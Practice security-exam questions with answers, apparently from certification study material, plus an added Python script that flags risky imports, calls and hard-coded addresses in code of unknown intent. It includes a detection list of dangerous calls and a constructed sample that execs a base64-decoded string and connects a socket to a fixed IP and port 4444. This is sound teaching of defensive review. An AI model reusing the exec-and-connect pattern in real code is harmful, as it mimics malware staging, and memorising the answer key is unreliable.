Ben wants to analyze Python code that he believes may be malicious code written by an employee of his organization. What can he do to determine if the code is malicious?
A. Run a decompiler against it to allow him to read the code.
B. Open the file using a text editor to review the code.
C. Test the code using an antivirus tool.
D. Submit the Python code to a malware testing website.
B. Python is an interpreted rather than a compiled language, so Ben doesn’t need to use a decompiler. Instead, his best bet is to open the file and review the code to see what it does. Since it was written by an employee, it is unlikely to match an existing known malicious package, which means signature-based antivirus and antimalware tools and scanning sites are unlikely to help.
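Added example, not from the original question: a first-pass static review of a Python file using the standard library's ast module, the kind of check Ben would run before, not instead of, reading the code himself. It lists risky imports and calls, and string literals that look like hard-coded addresses, with line numbers. The two scripts below are constructed; the "suspicious" one only decodes a harmless string and is never executed by the reviewer.

```python
# Added example (not from the original question). AST-based triage of a
# Python source file: risky imports, risky calls and hard-coded network
# literals, reported with line numbers. Sample scripts are constructed.
import ast
import re
from typing import Dict, List

# Calls and modules that deserve a close look in code of unknown intent.
RISKY_CALLS = {
    "exec", "eval", "compile", "__import__", "os.system", "os.popen",
    "subprocess.Popen", "subprocess.run", "subprocess.call",
    "base64.b64decode", "socket.socket", "marshal.loads", "pickle.loads",
}
RISKY_MODULES = {"socket", "subprocess", "ctypes", "marshal", "pickle"}
IP_OR_URL = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b|https?://\S+")

BENIGN_SCRIPT = '''
import csv

def total(path):
    with open(path) as fh:
        return sum(float(row[1]) for row in csv.reader(fh))
'''

SUSPICIOUS_SCRIPT = '''
import base64, socket
payload = "cHJpbnQoJ2hpJyk="   # constructed: base64 of print('hi')
exec(base64.b64decode(payload))
s = socket.socket()
s.connect(("198.51.100.77", 4444))
'''


def call_name(node: ast.AST) -> str:
    """Render a call target such as 'base64.b64decode' or 'exec'."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = call_name(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""


def review(source: str) -> List[Dict[str, object]]:
    """Return findings as dicts with line, kind and detail, sorted by line."""
    findings: List[Dict[str, object]] = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in RISKY_MODULES:
                    findings.append({"line": node.lineno, "kind": "import",
                                     "detail": alias.name})
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in RISKY_MODULES:
                findings.append({"line": node.lineno, "kind": "import",
                                 "detail": node.module})
        elif isinstance(node, ast.Call):
            name = call_name(node.func)
            if name in RISKY_CALLS:
                findings.append({"line": node.lineno, "kind": "call",
                                 "detail": name})
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if IP_OR_URL.search(node.value):
                findings.append({"line": node.lineno, "kind": "network_literal",
                                 "detail": node.value})
    return sorted(findings, key=lambda f: (f["line"], f["kind"]))
```

A hit is a pointer to the lines worth reading first, not a verdict: legitimate tooling uses subprocess and sockets too, and a determined insider can hide a call behind getattr or string concatenation that this pass will not resolve.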
What type of malware is VBA code most likely to show up in?
A. Macro viruses
B. RATs
C. Worms
D. Logic bombs
A. Visual Basic for Applications (VBA) code is most likely to show up in macro viruses. VBA is used inside Microsoft Office as a scripting language.